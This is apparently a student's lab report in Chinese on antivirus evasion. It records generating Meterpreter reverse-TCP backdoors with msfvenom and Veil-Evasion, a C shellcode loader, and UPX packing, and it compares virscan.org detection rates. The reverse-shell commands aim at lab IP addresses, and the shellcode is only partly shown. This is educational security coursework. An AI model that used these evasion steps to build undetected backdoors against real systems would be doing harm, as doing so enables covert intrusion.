20155308 《網絡攻防》 Exp3 免殺原理與實踐

20155308 《網絡攻防》 Exp3 免殺原理與實踐

基礎問題回答

1. 殺軟是如何檢測出惡意代碼的？
   

• 基於特徵來檢測：惡意代碼中通常會有一段有較明顯特徵的代碼也就是特徵碼，若是殺毒軟件檢測到有程序包含的特徵碼與其特徵碼庫的代碼相匹配，就會把該程序看成惡意軟件。
• 基於行爲來檢測：經過對惡意代碼的觀察、研究，有一些行爲是惡意代碼的共同行爲，並且比較特殊。因此當一個程序在運行時，殺毒軟件會監視其行爲，若是發現了這種特殊的行爲，則會把它當成惡意軟件。

1. 免殺是作什麼？

• 能使病毒木馬避免被殺毒軟件查殺的技術。

1. 免殺的基本方法有哪些？

• 特徵碼定位、加殼、加花、再編譯等等。可是這些方法在生活中都沒有怎麼使用過，因此但願經過這一次的實驗可以進行了解。

實踐過程記錄

使用msf生成後門程序的檢測

• 直接將上週作實驗時用msf生成的後門文件放在virscan.org中進行掃描，掃描結果以下：

以前我命名的後面文件名稱爲"20155308_backdoor.exe"，會產生如下提示：

• 因此我將文件名稱中的學號刪除，再進行掃描，結果以下：

• 能夠看出，報毒率挺高。若是在使用msf時對它多編碼幾回，觀察報毒率的變化。（進行編碼十次）

  Msfvenom是Metasploit平臺下用來編碼payloads免殺的工具。

# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > met-encoded.exe

• 將生成的文件放到網站上掃描一下：
  

• 能夠發現不管編碼多少次都是同樣，因此想要利用編碼次數來達到免殺效果顯然是不行的。

使用veil-evasion生成後門程序的檢測

Veil-Evasion是一個免殺平臺，與Metasploit有點相似，在Kalil軟件庫中有，但默認沒裝。免殺效果比較好。

• 安裝Veil-Evasion
• 這一部分由於下載速度太慢了，因此用了老師的虛擬機。
• 安裝以後，首先要啓用veil，輸入命令：「veil」。這部分我在進入的時候提示以下，因此我須要輸入「veil-evasion」進入。

• 輸入命令use python/meterpreter/rev_tcp設置payload。

• 輸入命令set LHOST 192.168.91.128 設置反彈鏈接IP(此IP爲kali機的IP地址)，輸入命令set LPORT 5308設置反彈端口5308。

• 輸入命令generate生成程序，並輸入後門程序名稱「hwf5308」

• 該生成的文件hwf5308.exe，路徑爲/var/lib/veil-evasion/output/compiled

• 最終用virscan工具查下試試，有沒有起到免殺的效果，結果以下

• 比以前用msf生成的文件報毒率要更低

利用shellcode編寫後門程序的檢測

• 使用msf生成一個C語言格式的shellcode，即輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.91.130 LPORT=5308 -f c
  （其中，LHOST輸入kali機的地址，LPORT輸入本身的學號）後進行編譯。

• 建立一個文件20155308.c，而後將unsigned char buf[]賦值到其中，代碼以下：

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
......
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

• 使用命令：i686-w64-mingw32-g++ 20155308.c -o 20155308.exe編譯這個.c文件爲可執行文件：

• 在掃描軟件上看看，由於系統提示不能出現數字，則我將文件名稱改成「hwf.exe」。

• 結果以下

• 發現有點做用。

加殼

壓縮殼UPX

# upx met_raw.exe -o met_raw.upxed.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    101678 ->     56110   55.18%    win32/pe     met.upxed.exe                 

Packed 1 file.
#

• 該指令加殼的命令格式：upx #須要加殼的文件名 -o #加殼後的文件名

此處爲了方便實驗，我將以前更名爲「hwf.exe」文件改成「5308.exe」。

• 進行掃描看看結果

• 將後門拷至主機後經過免殺

實驗體會

本次實驗是瞭解惡意軟件檢測機制，經過這方面的漏洞進行文件的更改和後門的處理，用掃描軟件進行掃描，以此來觀察各類處理優缺點。經過實際的動手操做，驗咱們也能夠發現要想製做出免殺的病毒其實也並不難，可是最關鍵的仍是在於咱們要提升本身的安全意識。經過對後門文件各類方式的隱藏的學習，咱們應該反過來進行配置防火牆，監控端口等一些行爲來保障咱們計算機的安全。

離實戰還缺些什麼技術或步驟

• 首先，咱們如今作實驗的時候常用一些簡單的命令使後門程序植入靶機，可是實戰中確定不會這麼簡單。
• 其次，咱們如今的科技在不斷髮展，正如老師實驗指導中所說，如今的一些殺軟的公司，時刻盯着那些新的後面手段，因此咱們得須要將技術成長到高於這些「老謀深算」的AV。